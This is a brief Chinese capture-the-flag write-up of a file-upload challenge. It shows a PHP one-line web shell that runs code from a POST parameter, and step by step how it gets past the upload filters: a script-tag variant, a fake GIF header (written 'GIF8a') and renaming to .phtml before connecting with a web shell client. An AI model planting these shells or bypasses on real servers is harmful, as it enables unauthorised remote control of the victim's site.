打开题目,为文件上传
尝试上传后缀为php的木马
<?php @eval($_POST['door']); ?>
结果
Not image!
将后缀改为jpg,结果
NO! HACKER! your file included ‘<?’
将木马改为
<script language='php'>@eval($_POST['door']);</script>
再次上传,结果
Don’t lie to me, it’s not image at all!!!
添加jpg文件头,修改木马为
FFD8FF
<script language='php'>@eval($_POST['door']);</script>
上传,结果
Don’t lie to me, it’s not image at all!!!
把jpg文件头改为gif文件头
GIF8a
<script language='php'>@eval($_POST['door']);</script>
上传成功
上传文件名: a.jpg
通过抓包修改a.jpg为a.phtml
上传文件名:a.phtml
上传成功
扫描目录可以发现上传的文件在“upload”下
蚁剑连接即可